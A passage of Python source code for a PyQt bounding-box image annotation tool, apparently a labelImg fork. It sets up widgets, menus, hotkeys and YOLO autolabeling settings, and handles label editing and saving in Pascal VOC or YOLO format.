# Create a widget for using default label
self.useDefaultLabelCheckbox = QCheckBox(u'Use default label')
self.useDefaultLabelCheckbox.setChecked(False)
self.defaultLabelTextLine = QLineEdit()
useDefaultLabelQHBoxLayout = QHBoxLayout()
useDefaultLabelQHBoxLayout.addWidget(self.useDefaultLabelCheckbox)
useDefaultLabelQHBoxLayout.addWidget(self.defaultLabelTextLine)
useDefaultLabelContainer = QWidget()
useDefaultLabelContainer.setLayout(useDefaultLabelQHBoxLayout)
# Create a widget for edit and diffc button
self.diffcButton = QCheckBox(u'difficult')
self.diffcButton.setChecked(False)
self.diffcButton.stateChanged.connect(self.btnstate)
self.editButton = QToolButton()
self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
# Add some of widgets to listLayout
listLayout.addWidget(self.editButton)
listLayout.addWidget(self.diffcButton)
listLayout.addWidget(useDefaultLabelContainer)
# Create and add a widget for showing current label items
self.labelList = QListWidget()
labelListContainer = QWidget()
labelListContainer.setLayout(listLayout)
self.labelList.itemActivated.connect(self.labelSelectionChanged)
self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
self.labelList.itemDoubleClicked.connect(self.editLabel)
# Connect to itemChanged to detect checkbox changes.
self.labelList.itemChanged.connect(self.labelItemChanged)
listLayout.addWidget(self.labelList)
self.dock = QDockWidget(u'Box Labels', self)
self.dock.setObjectName(u'Labels')
self.dock.setWidget(labelListContainer)
# Tzutalin 20160906 : Add file list and dock to move faster
self.fileListWidget = QListWidget()
self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
filelistLayout = QVBoxLayout()
filelistLayout.setContentsMargins(0, 0, 0, 0)
filelistLayout.addWidget(self.fileListWidget)
fileListContainer = QWidget()
fileListContainer.setLayout(filelistLayout)
self.filedock = QDockWidget(u'File List', self)
self.filedock.setObjectName(u'Files')
self.filedock.setWidget(fileListContainer)
# Create and add a widget for showing current path for parameters for yolo
self.yoloListWidget = QListWidget()
yololistLayout = QVBoxLayout()
yololistLayout.setContentsMargins(0, 0,0, 0)
yololistLayout.addWidget(self.yoloListWidget)
yoloListContainer = QWidget()
yoloListContainer.setLayout(yololistLayout)
self.yolodock = QDockWidget(u'YOLO configuration', self)
self.yolodock.setObjectName(u'classes')
self.yolodock.setWidget(yoloListContainer)
# Create and add a widget for showing classes that you can select
self.classListWidget = QListWidget()
self.classListWidget.itemDoubleClicked.connect(self.classitemDoubleClicked)
classlistLayout = QVBoxLayout()
classlistLayout.setContentsMargins(0, 0,0, 0)
classlistLayout.addWidget(self.classListWidget)
classListContainer = QWidget()
classListContainer.setLayout(classlistLayout)
self.classdock = QDockWidget(u'List of classes', self)
self.classdock.setObjectName(u'classes')
self.classdock.setWidget(classListContainer)
self.zoomWidget = ZoomWidget()
self.colorDialog = ColorDialog(parent=self)
self.canvas = Canvas(parent=self)
self.canvas.zoomRequest.connect(self.zoomRequest)
scroll = QScrollArea()
scroll.setWidget(self.canvas)
scroll.setWidgetResizable(True)
self.scrollBars = {
Qt.Vertical: scroll.verticalScrollBar(),
Qt.Horizontal: scroll.horizontalScrollBar()
}
self.scrollArea = scroll
self.canvas.scrollRequest.connect(self.scrollRequest)
self.canvas.newShape.connect(self.newShape)
self.canvas.shapeMoved.connect(self.setDirty)
self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)
self.setCentralWidget(scroll)
self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
# Tzutalin 20160906 : Add file list and dock to move faster
self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
self.filedock.setFeatures(QDockWidget.DockWidgetFloatable)
self.addDockWidget(Qt.RightDockWidgetArea, self.classdock)
self.classdock.setFeatures(QDockWidget.DockWidgetFloatable)
self.addDockWidget(Qt.RightDockWidgetArea, self.yolodock)
self.yolodock.setFeatures(QDockWidget.DockWidgetFloatable)
self.dockFeatures = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetFloatable
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
# Actions
action = partial(newAction, self)
quit = action('&Quit', self.close,
'Ctrl+Q', 'quit', u'Quit application')
open = action('&Open', self.openFile,
'Ctrl+O', 'open', u'Open image or label file')
opendir = action('&Open Dir', self.openDirDialog,
'Ctrl+u', 'open', u'Open Dir')
changeSavedir = action('&Change Save Dir', self.changeSavedirDialog,
'Ctrl+r', 'open', u'Change default saved Annotation dir')
openAnnotation = action('&Open Annotation', self.openAnnotationDialog,
'Ctrl+Shift+O', 'open', u'Open Annotation')
openNextImg = action('&Next Image', self.openNextImg,
'd', 'next', u'Open Next')
openPrevImg = action('&Prev Image', self.openPrevImg,
'a', 'prev', u'Open Prev')
nextBox = action('&Next Box', self.nextBox,
'n','next', u'Next Box')
backBox = action('&Back Box', self.backBox,
'b','prev', u'Back Box')
verify = action('&Verify Image', self.verifyImg,
'space', 'verify', u'Verify Image')
save = action('&Save', self.saveFile,
'Ctrl+S', 'save', u'Save labels to file', enabled=False)
save_format = action('&PascalVOC', self.change_format,
'Ctrl+', 'format_voc', u'Change save format', enabled=True)
saveAs = action('&Save As', self.saveFileAs,
'Ctrl+Shift+S', 'save-as', u'Save labels to a different file', enabled=False)
close = action('&Close', self.closeFile, 'Ctrl+W', 'close', u'Close current file')
resetAll = action('&ResetAll', self.resetAll, None, 'resetall', u'Reset all')
color1 = action('Box Line Color', self.chooseColor1,
'Ctrl+L', 'color_line', u'Choose Box line color')
createMode = action('Create\nRectBox', self.setCreateMode,
'w', 'new', u'Start drawing Boxs', enabled=False)
editMode = action('&Edit\nRectBox', self.setEditMode,
'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)
create = action('Create\nRectBox', self.createShape,
'w', 'new', u'Draw a new Box', enabled=False)
delete = action('Delete\nRectBox', self.deleteSelectedShape,
'Delete', 'delete', u'Delete', enabled=False)
copy = action('&Duplicate\nRectBox', self.copySelectedShape,
'Ctrl+D', 'copy', u'Create a duplicate of the selected Box',
enabled=False)
advancedMode = action('&Advanced Mode', self.toggleAdvancedMode,
'Ctrl+Shift+A', 'expert', u'Switch to advanced mode',
checkable=True)
hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
'Ctrl+H', 'hide', u'Hide all Boxs',
enabled=False)
showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
'Ctrl+A', 'hide', u'Show all Boxs',
enabled=False)
help = action('&Tutorial', self.showTutorialDialog, None, 'help', u'Show demos')
showInfo = action('&Information', self.showInfoDialog, None, 'help', u'Information')
zoom = QWidgetAction(self)
zoom.setDefaultWidget(self.zoomWidget)
self.zoomWidget.setWhatsThis(
u"Zoom in or out of the image. Also accessible with"
" %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
fmtShortcut("Ctrl+Wheel")))
self.zoomWidget.setEnabled(False)
zoomIn = action('Zoom &In', partial(self.addZoom, 10),
'Ctrl++', 'zoom-in', u'Increase zoom level', enabled=False)
zoomOut = action('&Zoom Out', partial(self.addZoom, -10),
'Ctrl+-', 'zoom-out', u'Decrease zoom level', enabled=False)
zoomOrg = action('&Original size', partial(self.setZoom, 100),
'Ctrl+=', 'zoom', u'Zoom to original size', enabled=False)
fitWindow = action('&Fit Window', self.setFitWindow,
'Ctrl+F', 'fit-window', u'Zoom follows window size',
checkable=True, enabled=False)
fitWidth = action('Fit &Width', self.setFitWidth,
'Ctrl+Shift+F', 'fit-width', u'Zoom follows window width',
checkable=True, enabled=False)
# Group zoom controls into a list for easier toggling.
zoomActions = (self.zoomWidget, zoomIn, zoomOut,
zoomOrg, fitWindow, fitWidth)
self.zoomMode = self.MANUAL_ZOOM
self.scalers = {
self.FIT_WINDOW: self.scaleFitWindow,
self.FIT_WIDTH: self.scaleFitWidth,
# Set to one to scale to 100% when loading files.
self.MANUAL_ZOOM: lambda: 1,
}
edit = action('&Edit Label', self.editLabel,
'Ctrl+E', 'edit', u'Modify the label of the selected Box',
enabled=False)
self.editButton.setDefaultAction(edit)
# Parameters fo yolo
autolabel = action('&Autolabel Dir', self.autolabeldir, None, 'autolabel', u'Show demos')
yoloimgdir = action('Set yolo images path', self.setYoloImgDir, None, 'Set yolo images path', u'Set yolo images path')
yoloresdir = action('Set yolo results path', self.setYoloResDir, None, 'Set yolo results path', u'Set yolo results path')
yoloconfig = action('Set yolo config path', self.setYoloConfig, None, 'Set yolo config path', u'Set yolo config path')
yoloweights = action('Set yolo weights path', self.setYoloWeights, None, 'Set yolo weights path', u'Set yolo weights path')
yolothres = action('Set yolo threshold', self.setYoloThreshold, None, 'Set yolo threshold', 'u,Set yolo threshold')
# Hot keys for class assignments
instantedit = action('set class 0', self.mediator0, '0','nnnn', u'Next Box')
instantedit1 = action('set class 1', self.mediator1, '1','nnnn', u'Next Box')
instantedit2 = action('set class 2', self.mediator2, '2','nnnn', u'Next Box')
instantedit3 = action('set class 3', self.mediator3, '3','nnnn', u'Next Box')
instantedit4 = action('set class 4', self.mediator4, '4','nnnn', u'Next Box')
instantedit5 = action('set class 5', self.mediator5, '5','nnnn', u'Next Box')
instantedit6 = action('set class 6', self.mediator6, '6','nnnn', u'Next Box')
instantedit7 = action('set class 7', self.mediator7, '7','nnnn', u'Next Box')
instantedit8 = action('set class 8', self.mediator8, '8','nnnn', u'Next Box')
instantedit9 = action('set class 9', self.mediator9, '9','nnnn', u'Next Box')
shapeLineColor = action('Shape &Line Color', self.chshapeLineColor,
icon='color_line', tip=u'Change the line color for this specific shape',
enabled=False)
shapeFillColor = action('Shape &Fill Color', self.chshapeFillColor,
icon='color', tip=u'Change the fill color for this specific shape',
enabled=False)
labels = self.dock.toggleViewAction()
labels.setText('Show/Hide Label Panel')
labels.setShortcut('Ctrl+Shift+L')
# Lavel list context menu.
labelMenu = QMenu()
addActions(labelMenu, (edit, delete))
self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
self.labelList.customContextMenuRequested.connect(
self.popLabelListMenu)
# Store actions for further handling.
self.actions = struct(save=save, save_format=save_format, saveAs=saveAs, open=open, close=close, resetAll = resetAll,
lineColor=color1, create=create, delete=delete, edit=edit, copy=copy, nextBox=nextBox, backBox=backBox,
createMode=createMode, editMode=editMode, advancedMode=advancedMode,
shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
fitWindow=fitWindow, fitWidth=fitWidth,
zoomActions=zoomActions,
fileMenuActions=(
open, opendir, save, saveAs, close, resetAll, quit),
beginner=(), advanced=(),
editMenu=(edit, copy, delete, nextBox, backBox,
None, color1),
beginnerContext=(create, edit, copy, delete, nextBox, backBox),
advancedContext=(createMode, editMode, edit, copy,
delete, shapeLineColor, shapeFillColor,nextBox, backBox ),
onLoadActive=(
close, create, createMode, editMode),
onShapesPresent=(saveAs, hideAll, showAll))
self.menus = struct(
file=self.menu('&File'),
edit=self.menu('&Edit'),
view=self.menu('&View'),
help=self.menu('&Help'),
instantedit=self.menu('&InstantEdit'),
autolabeling=self.menu('&Autolabeling'),
recentFiles=QMenu('Open &Recent'),
labelList=labelMenu)
# Auto saving : Enable auto saving if pressing next
self.autoSaving = QAction("Auto Saving", self)
self.autoSaving.setCheckable(True)
self.autoSaving.setChecked(settings.get(SETTING_AUTO_SAVE, False))
# Sync single class mode from PR#106
self.singleClassMode = QAction("Single Class Mode", self)
self.singleClassMode.setShortcut("Ctrl+Shift+S")
self.singleClassMode.setCheckable(True)
self.singleClassMode.setChecked(settings.get(SETTING_SINGLE_CLASS, False))
self.lastLabel = None
# Add option to enable/disable labels being painted at the top of bounding boxes
self.paintLabelsOption = QAction("Paint Labels", self)
self.paintLabelsOption.setShortcut("Ctrl+Shift+P")
self.paintLabelsOption.setCheckable(True)
self.paintLabelsOption.setChecked(settings.get(SETTING_PAINT_LABEL, False))
self.paintLabelsOption.triggered.connect(self.togglePaintLabelsOption)
addActions(self.menus.file,
(open, opendir, changeSavedir, openAnnotation, self.menus.recentFiles, save, save_format, saveAs, close, resetAll, quit))
addActions(self.menus.help, (help, showInfo))
addActions(self.menus.view, (
self.autoSaving,
self.singleClassMode,
self.paintLabelsOption,
labels, advancedMode, None,
hideAll, showAll, None,
zoomIn, zoomOut, zoomOrg, None,
fitWindow, fitWidth))
addActions(self.menus.instantedit, (
instantedit, instantedit1, instantedit1, instantedit2, instantedit3, instantedit4, instantedit5,
instantedit6, instantedit7, instantedit8, instantedit9))
addActions(self.menus.autolabeling, (
yoloimgdir, yoloresdir, yoloconfig, yoloweights,yolothres, autolabel))
self.menus.file.aboutToShow.connect(self.updateFileMenu)
# Custom context menu for the canvas widget:
addActions(self.canvas.menus[0], self.actions.beginnerContext)
addActions(self.canvas.menus[1], (
action('&Copy here', self.copyShape),
action('&Move here', self.moveShape)))
self.tools = self.toolbar('Tools')
self.actions.beginner = (
open, opendir, changeSavedir, openNextImg, openPrevImg,nextBox,backBox,
verify, save, save_format, None, create, copy, delete, None,
zoomIn, zoom, zoomOut, fitWindow, fitWidth)
self.actions.advanced = (
open, opendir, changeSavedir, openNextImg,openPrevImg,nextBox,backBox,
save, save_format, None,
createMode, editMode, None,
hideAll, showAll)
self.statusBar().showMessage('%s started.' % __appname__)
self.statusBar().show()
# Application state.
self.image = QImage()
self.filePath = ustr(defaultFilename)
self.recentFiles = []
self.maxRecent = 7
self.lineColor = None
self.fillColor = None
self.zoom_level = 100
self.fit_window = False
# Add Chris
self.difficult = False
## Fix the compatible issue for qt4 and qt5. Convert the QStringList to python list
if settings.get(SETTING_RECENT_FILES):
if have_qstring():
recentFileQStringList = settings.get(SETTING_RECENT_FILES)
self.recentFiles = [ustr(i) for i in recentFileQStringList]
else:
self.recentFiles = recentFileQStringList = settings.get(SETTING_RECENT_FILES)
size = settings.get(SETTING_WIN_SIZE, QSize(600, 500))
position = settings.get(SETTING_WIN_POSE, QPoint(0, 0))
self.resize(size)
self.move(position)
saveDir = ustr(settings.get(SETTING_SAVE_DIR, None))
self.lastOpenDir = ustr(settings.get(SETTING_LAST_OPEN_DIR, None))
if self.defaultSaveDir is None and saveDir is not None and os.path.exists(saveDir):
self.defaultSaveDir = saveDir
self.statusBar().showMessage('%s started. Annotation will be saved to %s' %
(__appname__, self.defaultSaveDir))
self.statusBar().show()
self.restoreState(settings.get(SETTING_WIN_STATE, QByteArray()))
Shape.line_color = self.lineColor = QColor(settings.get(SETTING_LINE_COLOR, DEFAULT_LINE_COLOR))
Shape.fill_color = self.fillColor = QColor(settings.get(SETTING_FILL_COLOR, DEFAULT_FILL_COLOR))
self.canvas.setDrawingColor(self.lineColor)
# Add chris
Shape.difficult = self.difficult
def xbool(x):
if isinstance(x, QVariant):
return x.toBool()
return bool(x)
if xbool(settings.get(SETTING_ADVANCE_MODE, False)):
self.actions.advancedMode.setChecked(True)
self.toggleAdvancedMode()
# Populate the File menu dynamically.
self.updateFileMenu()
# Since loading the file may take some time, make sure it runs in the background.
if self.filePath and os.path.isdir(self.filePath):
self.queueEvent(partial(self.importDirImages, self.filePath or ""))
elif self.filePath:
self.queueEvent(partial(self.loadFile, self.filePath or ""))
# Callbacks:
self.zoomWidget.valueChanged.connect(self.paintCanvas)
self.populateModeActions()
# Display cursor coordinates at the right of status bar
self.labelCoordinates = QLabel('')
self.statusBar().addPermanentWidget(self.labelCoordinates)
# Open Dir if deafult file
if self.filePath and os.path.isdir(self.filePath):
self.openDirDialog(dirpath=self.filePath)
if(not tensor_flow_is_present):
warning = QMessageBox.warning(self, 'warning', "At least one module from the list: cv2, tensorflow, keras is absent. \
Autolabeling feature is disabled", QMessageBox.Ok)
self.setClasses()
## Support Functions ##
def set_format(self, save_format):
if save_format == FORMAT_PASCALVOC:
self.actions.save_format.setText(FORMAT_PASCALVOC)
self.actions.save_format.setIcon(newIcon("format_voc"))
self.usingPascalVocFormat = True
self.usingYoloFormat = False
LabelFile.suffix = XML_EXT
elif save_format == FORMAT_YOLO:
self.actions.save_format.setText(FORMAT_YOLO)
self.actions.save_format.setIcon(newIcon("format_yolo"))
self.usingPascalVocFormat = False
self.usingYoloFormat = True
LabelFile.suffix = TXT_EXT
def change_format(self):
if self.usingPascalVocFormat: self.set_format(FORMAT_YOLO)
elif self.usingYoloFormat: self.set_format(FORMAT_PASCALVOC)
def noShapes(self):
return not self.itemsToShapes
def toggleAdvancedMode(self, value=True):
self._beginner = not value
self.canvas.setEditing(True)
self.populateModeActions()
self.editButton.setVisible(not value)
if value:
self.actions.createMode.setEnabled(True)
self.actions.editMode.setEnabled(False)
self.dock.setFeatures(self.dock.features() | self.dockFeatures)
else:
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
def populateModeActions(self):
if self.beginner():
tool, menu = self.actions.beginner, self.actions.beginnerContext
else:
tool, menu = self.actions.advanced, self.actions.advancedContext
self.tools.clear()
addActions(self.tools, tool)
self.canvas.menus[0].clear()
addActions(self.canvas.menus[0], menu)
self.menus.edit.clear()
actions = (self.actions.create,) if self.beginner()\
else (self.actions.createMode, self.actions.editMode)
addActions(self.menus.edit, actions + self.actions.editMenu)
def setBeginner(self):
self.tools.clear()
addActions(self.tools, self.actions.beginner)
def setAdvanced(self):
self.tools.clear()
addActions(self.tools, self.actions.advanced)
def setDirty(self):
self.dirty = True
self.actions.save.setEnabled(True)
def setClean(self):
self.dirty = False
self.actions.save.setEnabled(False)
self.actions.create.setEnabled(True)
def toggleActions(self, value=True):
"""Enable/Disable widgets which depend on an opened image."""
for z in self.actions.zoomActions:
z.setEnabled(value)
for action in self.actions.onLoadActive:
action.setEnabled(value)
def queueEvent(self, function):
QTimer.singleShot(0, function)
def status(self, message, delay=5000):
self.statusBar().showMessage(message, delay)
def resetState(self):
self.itemsToShapes.clear()
self.shapesToItems.clear()
self.labelList.clear()
self.filePath = None
self.imageData = None
self.labelFile = None
self.canvas.resetState()
self.labelCoordinates.clear()
def currentItem(self):
items = self.labelList.selectedItems()
if items:
return items[0]
return None
def addRecentFile(self, filePath):
if filePath in self.recentFiles:
self.recentFiles.remove(filePath)
elif len(self.recentFiles) >= self.maxRecent:
self.recentFiles.pop()
self.recentFiles.insert(0, filePath)
def beginner(self):
return self._beginner
def advanced(self):
return not self.beginner()
def getAvailableScreencastViewer(self):
osName = platform.system()
if osName == 'Windows':
return ['C:\\Program Files\\Internet Explorer\\iexplore.exe']
elif osName == 'Linux':
return ['xdg-open']
elif osName == 'Darwin':
return ['open', '-a', 'Safari']
## Callbacks ##
def showTutorialDialog(self):
subprocess.Popen(self.screencastViewer + [self.screencast])
def showInfoDialog(self):
msg = u'Name:{0} \nApp Version:{1} \n{2} '.format(__appname__, __version__, sys.version_info)
QMessageBox.information(self, u'Information', msg)
def autolabeldir(self):
if (tensor_flow_is_present):
self.open_new_dialog()
self.thr1 = threading.Thread(target=new_predictor.labeling, name = 'new_predictor', args=(self.yolo_img_path, self.yolo_res_path, self.yolo_config_path, self.yolo_weights_path, self.yolo_thres, self.progBar))
self.thr1.start()
else:
warning = QMessageBox.warning(self, 'warning', "At least on module from the list: cv2, tensorflow, keras is absent. \
Autolabeling feature is disabled", QMessageBox.Ok)
def open_new_dialog(self):
self.progBar = ProgressBar()
self.progBar.show()
def yoloConfRefresh(self):
if (tensor_flow_is_present):
self.yoloListWidget.clear()
item = QListWidgetItem("yolo_img_path: " + self.yoloConfList[0])
self.yoloListWidget.addItem(item)
item = QListWidgetItem("yolo_res_path: " + self.yoloConfList[1])
self.yoloListWidget.addItem(item)
item = QListWidgetItem("yolo_config_path: " + self.yoloConfList[2])
self.yoloListWidget.addItem(item)
item = QListWidgetItem("yolo_weights_path: " + self.yoloConfList[3])
self.yoloListWidget.addItem(item)
b=str(self.yoloConfList[4])
item = QListWidgetItem("threshold: " +b)
self.yoloListWidget.addItem(item)
else:
self.yoloListWidget.clear()
item = QListWidgetItem("The autolabeling feature is disabled")
self.yoloListWidget.addItem(item)
def setYoloImgDir(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
self.yolo_img_path = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
self.yoloConfList[0]=self.yolo_img_path
self.yoloConfRefresh()
def setYoloResDir(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
self.yolo_res_path = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
self.yoloConfList[1]=self.yolo_res_path
self.yoloConfRefresh()
def setClasses(self):
if (os.path.exists(self.yolo_config_path)):
with open(self.yolo_config_path) as config_buffer:
config = json.loads(config_buffer.read())
self.labelHist = config['model']['labels']
self.classListWidget.clear()
for classes in self.labelHist:
a = self.labelHist.index(classes)
b = str(a)
b = b + ": "
item = QListWidgetItem(b + classes)
self.classListWidget.addItem(item)
self.yoloConfList[2] = self.yolo_config_path
self.yoloConfRefresh()
def setYoloConfig(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
self.yolo_config_path = QFileDialog.getOpenFileName(self, 'Open file', '/home')[0]
self.setClasses()
def setYoloWeights(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
self.yolo_weights_path = QFileDialog.getOpenFileName(self, 'Open file', '/home')[0]
self.yoloConfList[3]=self.yolo_weights_path
self.yoloConfRefresh()
def setYoloThreshold(self):
text, ok = QInputDialog.getText(self, 'Input Dialog',
'Enter threshold:')
if ok:
self.yolo_thres = (float(text))
if (self.yolo_thres <= 1 and self.yolo_thres >= 0):
self.yoloConfList[4]=self.yolo_thres
self.yoloConfRefresh()
def createShape(self):
assert self.beginner()
self.canvas.setEditing(False)
self.actions.create.setEnabled(False)
def toggleDrawingSensitive(self, drawing=True):
"""In the middle of drawing, toggling between modes should be disabled."""
self.actions.editMode.setEnabled(not drawing)
if not drawing and self.beginner():
# Cancel creation.
print('Cancel creation.')
self.canvas.setEditing(True)
self.canvas.restoreCursor()
self.actions.create.setEnabled(True)
def toggleDrawMode(self, edit=True):
self.canvas.setEditing(edit)
self.actions.createMode.setEnabled(edit)
self.actions.editMode.setEnabled(not edit)
def setCreateMode(self):
assert self.advanced()
self.toggleDrawMode(False)
def setEditMode(self):
assert self.advanced()
self.toggleDrawMode(True)
self.labelSelectionChanged()
def updateFileMenu(self):
currFilePath = self.filePath
def exists(filename):
return os.path.exists(filename)
menu = self.menus.recentFiles
menu.clear()
files = [f for f in self.recentFiles if f !=
currFilePath and exists(f)]
for i, f in enumerate(files):
icon = newIcon('labels')
action = QAction(
icon, '&%d %s' % (i + 1, QFileInfo(f).fileName()), self)
action.triggered.connect(partial(self.loadRecent, f))
menu.addAction(action)
def popLabelListMenu(self, point):
self.menus.labelList.exec_(self.labelList.mapToGlobal(point))
def editLabel(self):
if not self.canvas.editing():
return
item = self.currentItem()
text = self.labelDialog.popUp(item.text())
if text is not None:
item.setText(text)
item.setBackground(generateColorByText(text))
self.setDirty()
def mediator0(self):
self.InstanteditLabel(0)
def mediator1(self):
self.InstanteditLabel(1)
def mediator2(self):
self.InstanteditLabel(2)
def mediator3(self):
self.InstanteditLabel(3)
def mediator4(self):
self.InstanteditLabel(4)
def mediator5(self):
self.InstanteditLabel(5)
def mediator6(self):
self.InstanteditLabel(6)
def mediator7(self):
self.InstanteditLabel(7)
def mediator8(self):
self.InstanteditLabel(8)
def mediator9(self):
self.InstanteditLabel(9)
def InstanteditLabel(self,number):
if self.canvas.selectedShape:
if not self.canvas.editing():
return
if (number>(len(self.labelHist)-1)):
return
item = self.currentItem()
#text = self.labelDialog.popUp(item.text())
text = self.labelHist[number]
if text is not None:
item.setText(text)
item.setBackground(generateColorByText(text))
self.setDirty()
# Tzutalin 20160906 : Add file list and dock to move faster
def fileitemDoubleClicked(self, item=None):
currIndex = self.mImgList.index(ustr(item.text()))
if currIndex < len(self.mImgList):
filename = self.mImgList[currIndex]
if filename:
self.loadFile(filename)
def classitemDoubleClicked(self, item=None):
currText = ustr(item.text())[ustr(item.text()).find(' ')+1:]
currIndex = self.labelHist.index(currText)
if currIndex < len(self.labelHist):
classname = self.labelHist[currIndex]
if classname:
self.InstanteditLabel(currIndex)
# Add chris
def btnstate(self, item= None):
""" Function to handle difficult examples
Update on each object """
if not self.canvas.editing():
return
item = self.currentItem()
if not item: # If not selected Item, take the first one
item = self.labelList.item(self.labelList.count()-1)
difficult = self.diffcButton.isChecked()
try:
shape = self.itemsToShapes[item]
except:
pass
# Checked and Update
try:
if difficult != shape.difficult:
shape.difficult = difficult
self.setDirty()
else: # User probably changed item visibility
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
except:
pass
# React to canvas signals.
def shapeSelectionChanged(self, selected=False):
if self._noSelectionSlot:
self._noSelectionSlot = False
else:
shape = self.canvas.selectedShape
if shape:
self.shapesToItems[shape].setSelected(True)
else:
self.labelList.clearSelection()
self.actions.delete.setEnabled(selected)
self.actions.copy.setEnabled(selected)
self.actions.edit.setEnabled(selected)
self.actions.shapeLineColor.setEnabled(selected)
self.actions.shapeFillColor.setEnabled(selected)
def addLabel(self, shape):
shape.paintLabel = self.paintLabelsOption.isChecked()
item = HashableQListWidgetItem(shape.label)
item.setFlags(item.flags() | Qt.ItemIsUserCheckable)
item.setCheckState(Qt.Checked)
item.setBackground(generateColorByText(shape.label))
self.itemsToShapes[item] = shape
self.shapesToItems[shape] = item
self.labelList.addItem(item)
for action in self.actions.onShapesPresent:
action.setEnabled(True)
def remLabel(self, shape):
if shape is None:
# print('rm empty label')
return
item = self.shapesToItems[shape]
self.labelList.takeItem(self.labelList.row(item))
del self.shapesToItems[shape]
del self.itemsToShapes[item]
def loadLabels(self, shapes):
s = []
for label, points, line_color, fill_color, difficult in shapes:
shape = Shape(label=label)
for x, y in points:
shape.addPoint(QPointF(x, y))
shape.difficult = difficult
shape.close()
s.append(shape)
if line_color:
shape.line_color = QColor(*line_color)
else:
shape.line_color = generateColorByText(label)
if fill_color:
shape.fill_color = QColor(*fill_color)
else:
shape.fill_color = generateColorByText(label)
self.addLabel(shape)
self.canvas.loadShapes(s)
def saveLabels(self, annotationFilePath):
annotationFilePath = ustr(annotationFilePath)
if self.labelFile is None:
self.labelFile = LabelFile()
self.labelFile.verified = self.canvas.verified
def format_shape(s):
return dict(label=s.label,
line_color=s.line_color.getRgb(),
fill_color=s.fill_color.getRgb(),
points=[(p.x(), p.y()) for p in s.points],
# add chris
difficult = s.difficult)
shapes = [format_shape(shape) for shape in self.canvas.shapes]
# Can add differrent annotation formats here
try:
if self.usingPascalVocFormat is True:
if ustr(annotationFilePath[-4:]) != ".xml":
annotationFilePath += XML_EXT
print ('Img: ' + self.filePath + ' -> Its xml: ' + annotationFilePath)
self.labelFile.savePascalVocFormat(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
elif self.usingYoloFormat is True:
if annotationFilePath[-4:] != ".txt":
annotationFilePath += TXT_EXT
print ('Img: ' + self.filePath + ' -> Its txt: ' + annotationFilePath)
self.labelFile.saveYoloFormat(annotationFilePath, shapes, self.filePath, self.imageData, self.labelHist,
self.lineColor.getRgb(), self.fillColor.getRgb())
else:
self.labelFile.save(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
return True
except LabelFileError as e:
self.errorMessage(u'Error saving label data', u'<b>%s</b>' % e)
return False
def copySelectedShape(self):
self.addLabel(self.canvas.copySelectedShape())
# fix copy and delete
self.shapeSelectionChanged(True)
def labelSelectionChanged(self):
item = self.currentItem()
if item and self.canvas.editing():
self._noSelectionSlot = True
self.canvas.selectShape(self.itemsToShapes[item])
shape = self.itemsToShapes[item]
# Add Chris
self.diffcButton.setChecked(shape.difficult)
def labelItemChanged(self, item):
shape = self.itemsToShapes[item]
label = item.text()
if label != shape.label:
shape.label = item.text()
shape.line_color = generateColorByText(shape.label)
self.setDirty()
else: # User probably changed item visibility
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
# Callback functions:
def newShape(self):
"""Pop-up and give focus to the label editor.
position MUST be in global coordinates.
"""
if not self.useDefaultLabelCheckbox.isChecked() or not self.defaultLabelTextLine.text():
if len(self.labelHist) > 0:
self.labelDialog = LabelDialog(
parent=self, listItem=self.labelHist)
# Sync single class mode from PR#106
if self.singleClassMode.isChecked() and self.lastLabel:
text = self.lastLabel
else:
text = self.labelDialog.popUp(text=self.prevLabelText)
self.lastLabel = text
else:
text = self.defaultLabelTextLine.text()
# Add Chris
self.diffcButton.setChecked(False)
if text is not None:
self.prevLabelText = text
generate_color = generateColorByText(text)
shape = self.canvas.setLastLabel(text, generate_color, generate_color)
self.addLabel(shape)
if self.beginner(): # Switch to edit mode.
self.canvas.setEditing(True)
self.actions.create.setEnabled(True)
else:
